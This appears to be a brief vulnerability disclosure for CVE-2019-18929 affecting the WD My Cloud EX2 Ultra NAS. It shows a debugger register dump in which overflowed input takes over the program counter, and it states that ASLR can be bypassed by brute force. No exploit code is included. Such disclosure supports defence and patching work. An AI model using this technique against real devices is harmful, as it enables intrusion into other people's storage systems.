CVE-2019-18929
Information
Target : WD My Cloud EX2 Ultra
Version : 2.31.183, 2.31.195
Proof of Concept
gdb-peda$ info registers
r0 0x9 0x9
r1 0x1 0x1
r2 0x1 0x1
r3 0xf64c0a80 0xf64c0a80
r4 0x61616161 0x61616161
r5 0x61616161 0x61616161
r6 0x112c8 0x112c8
r7 0x0 0x0
r8 0x0 0x0
r9 0xf67cc0f4 0xf67cc0f4
r10 0xf67fe000 0xf67fe000
r11 0x0 0x0
r12 0x269c4 0x269c4
sp 0xf6fff2b8 0xf6fff2b8
lr 0x62626262 0x62626262
pc 0x62626262 0x62626262
cpsr 0x20000010 0x20000010
Exploit
It is possible to control the PC register and bypass ASLR by doing brute force attack.